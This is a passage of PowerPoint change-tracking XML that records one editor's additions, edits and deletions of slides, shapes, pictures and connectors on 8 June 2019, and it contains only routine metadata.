          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:37:20.095" v="1342"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="13" creationId="{D02E713E-5DD3-4B8E-9DFC-D65C225609ED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:39:52.908" v="1355" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="14" creationId="{09267141-06D5-4713-AFAA-82C959F35E3F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:42:06.346" v="1363" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="4" creationId="{5502C22F-8F6F-4E80-B6E2-9ED0111ADE0D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:40:25.642" v="1358"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="10" creationId="{BBBA3F5F-8426-450E-8218-E827C3B91180}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:39:57.814" v="1356" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="12" creationId="{F2AF1492-F1F3-4214-B561-84F350562436}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:31.709" v="2202"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="83843372" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:51:10.276" v="1561" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:51:10.276" v="1561" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="2" creationId="{C3628ED8-9331-46E5-B8CC-52610F82D4AA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:31.709" v="2203"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="777082745" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:13.881" v="2201"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2507243378" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:43.413" v="2231" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4024087431" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:43.413" v="2231" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4024087431" sldId="266"/>
            <ac:spMk id="4" creationId="{D3E13A53-D891-4A54-8903-F8E8B2FE28AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:16:54.115" v="878" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="458480970" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:16:54.115" v="878" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="5" creationId="{CAF3DF89-A507-4527-8C36-8E1BA28FE08E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:16:39.819" v="875"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:picMk id="7" creationId="{C1C523EC-ACDB-4321-AFE1-33420F3E0C39}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:28:30.415" v="2007" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838342288" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:37:55.382" v="530" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="4" creationId="{9DBE4462-2011-4557-9006-41193033731F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:28:15.937" v="146" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="5" creationId="{DD1D58D5-0218-4BED-90D6-4F6819111FE2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:28:30.415" v="2007" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="6" creationId="{D9015465-6EB7-4351-B478-AB5BC688F149}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:57:15.203" v="719" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="10" creationId="{ADCFA970-849F-434C-AC9A-DE98BBC742FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:38:01.945" v="531" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="11" creationId="{B830C05C-3D77-4EC1-8039-BDC109D4E2F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:29:06.625" v="154" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="14" creationId="{D5C8A1F7-9EF7-4639-9B05-3DF76595841A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:35:10.178" v="447" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="16" creationId="{BC08AF8C-D069-44C4-A385-95392D4F13C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:57:34.594" v="781" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="18" creationId="{344CAF7D-C2A7-463E-9CA8-45C29E8E804B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:57:40.969" v="786" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="19" creationId="{71B27666-C027-4308-AF12-E6087643018A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:51:41.526" v="1567" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="20" creationId="{5BEA1B4E-8BCD-4C91-B227-313582B28B43}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:51:45.058" v="1570" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="21" creationId="{6627F4F1-8772-4515-90A4-3B32C309AC44}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:51:46.433" v="1575" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="22" creationId="{C4F6A104-6241-49FA-A8C2-3DE1802675A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:40:21.242" v="551" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="23" creationId="{0D2B3FEB-A596-4D45-AA5A-EB9B977F9BA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:57:23.063" v="723" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="25" creationId="{F83F6674-1A75-4C4D-9B43-CFDD6A659DB1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:29:06.610" v="153" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:picMk id="12" creationId="{9D04CF17-C5BB-4AED-878D-4A40796184B3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:43:15.246" v="577" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:cxnSpMk id="8" creationId="{6271C3AC-2034-4E3A-9C36-013F6E09A3C8}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:39:10.882" v="545"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:cxnSpMk id="13" creationId="{6C7BB61E-C0AC-448D-A9D4-865BE5F4FF34}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:43:37.299" v="579" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:cxnSpMk id="24" creationId="{084B3340-E5CE-48B8-B32D-1236A4BDA177}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:35:25.814" v="1326" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1408271386" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:35:25.814" v="1326" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="2" creationId="{7981C555-D780-48C2-BF22-749C37BE657E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:44:41.799" v="601" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="5" creationId="{F3F015C1-4E03-433D-BF3E-B033B779896E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:50:40.120" v="1552" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="187454225" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:50:40.120" v="1552" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="2" creationId="{0A53C3F5-D307-4955-927D-B5BDDE550C9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:18:16.881" v="889" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="3" creationId="{910D9E47-86D0-43CE-A061-819D10D73D09}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:18:41.056" v="894" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="5" creationId="{7FC67A40-8C07-4199-A39D-AF5699B7438C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:19:25.978" v="899"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="6" creationId="{F48928EA-AC3C-4998-8AAA-FDCCD6FD92EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:21:23.655" v="911"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="8" creationId="{98C74D30-864E-4120-A5E3-8100EEB1A945}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:22:59.722" v="978" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="11" creationId="{5FADCE3A-B006-4E48-B42C-C553FA2FB26D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:24:27.379" v="1026" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="12" creationId="{BB2B2C76-8F4C-4D85-B9A4-42B811C58554}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:25:22.129" v="1040" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="14" creationId="{4137E0D1-5BA5-4566-B774-80FE9F1AA24A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:20:48.515" v="907" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:cxnSpMk id="7" creationId="{5B6A7CB5-5D04-444B-8FBB-135C834E7DCC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:26:35.884" v="1050"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:cxnSpMk id="9" creationId="{BDF0792A-4069-45C9-BC19-D086936CA1F3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:26:42.994" v="1051"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:cxnSpMk id="10" creationId="{4C212CB9-AC66-4AE2-8AC2-6F52EF637D6A}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:26:19.463" v="1047"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:cxnSpMk id="13" creationId="{7C934C98-FC62-49F8-B008-0F9F741F08AA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:26:05.650" v="1046"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:cxnSpMk id="15" creationId="{D8E6F51A-8675-4753-A2FD-D8573B0C12DE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:45:11.627" v="1441" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3138890788" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:39:24.861" v="1347" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="2" creationId="{911EAF35-35B3-4748-9A34-248AEADE3DE3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:44:16.596" v="1418" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="3" creationId="{624DA486-7F70-4C0D-A4E6-51FA918C3BB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:43:17.768" v="1414" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="7" creationId="{892C0988-BE65-4A77-9C4D-2148209DD684}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
